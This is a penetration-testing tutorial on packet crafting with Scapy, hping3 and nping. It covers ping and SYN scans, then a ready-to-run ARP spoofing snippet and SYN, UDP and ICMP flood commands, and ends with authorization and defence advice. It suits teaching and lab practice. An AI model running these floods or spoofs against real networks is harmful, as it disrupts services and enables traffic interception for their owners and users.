Packet Crafting
Packet crafting allows penetration testers and security professionals to create custom network packets to test the robustness of network defenses and identify vulnerabilities. This guide covers network scanning and attack simulation with common packet crafting tools.
Scapy: A powerful Python library used for crafting and manipulating network packets.
Hping3: A command-line tool for crafting and analyzing TCP/IP packets.
Nping: Part of the Nmap suite, used for packet generation and response analysis.
Netcat: Known as the "Swiss Army knife" for networking, useful for crafting packets and network communication.
Using Scapy
Installation:
sudo apt-get install python3-scapy
Basic Usage:
Import Scapy:
from scapy.all import *
ICMP Ping Scan:
ip = "192.168.1.1"
packet = IP(dst=ip)/ICMP()
response = sr1(packet, timeout=1)
if response:
    # Any reply within the timeout means the host answered the echo request
    print(f"{ip} is up")
TCP SYN Scan:
ip = "192.168.1.1"
port = 80
packet = IP(dst=ip)/TCP(dport=port, flags="S")
response = sr1(packet, timeout=1)
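# sr1() returns None on timeout; SYN+ACK (0x12) indicates a listening port
if response is not None and response.haslayer(TCP) and int(response[TCP].flags) & 0x12 == 0x12:
    print(f"{ip}:{port} is open")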
Using Hping3
Installation:
sudo apt-get install hping3
Basic Usage:
ICMP Ping:
hping3 -1 192.168.1.1
TCP SYN Scan:
hping3 -S 192.168.1.1 -p 80
UDP Scan:
hping3 -2 192.168.1.1 -p 53
Using Nping
Installation:
sudo apt-get install nmap
Basic Usage:
ICMP Echo Request:
nping --icmp 192.168.1.1
TCP SYN Scan:
nping --tcp -p 80 192.168.1.1
Using Scapy
ARP Spoofing:
Send ARP Reply:
target_ip = "192.168.1.10"
spoof_ip = "192.168.1.1"
target_mac = "aa:bb:cc:dd:ee:ff"
packet = ARP(op=2, pdst=target_ip, psrc=spoof_ip, hwdst=target_mac)
send(packet, verbose=0)
TCP SYN Flood:
Send SYN Packets in a Loop:
target_ip = "192.168.1.1"
target_port = 80
while True:
    packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
    send(packet, verbose=0)
Using Hping3
TCP SYN Flood:
hping3 -S 192.168.1.1 -p 80 --flood
UDP Flood:
hping3 -2 192.168.1.1 -p 53 --flood
ICMP Flood:
hping3 -1 192.168.1.1 --flood
Authorization: Always ensure you have explicit permission from the network owner before conducting any scanning or attack simulations.
Controlled Environment: Perform these activities in a controlled and isolated environment to prevent accidental damage or disruption.
Responsible Disclosure: If you discover vulnerabilities, report them responsibly to the appropriate stakeholders with recommendations for mitigation.
Network Segmentation: Properly segment networks to limit the impact of potential attacks.
Intrusion Detection/Prevention Systems: Deploy IDS/IPS to detect and prevent malicious packet crafting activities.
Regular Audits: Conduct regular security audits to identify and remediate vulnerabilities.
Strong Access Controls: Implement strong access controls and authentication mechanisms to protect network devices and systems.
By using these tools and techniques, penetration testers can effectively scan networks and simulate attacks to identify and address security weaknesses.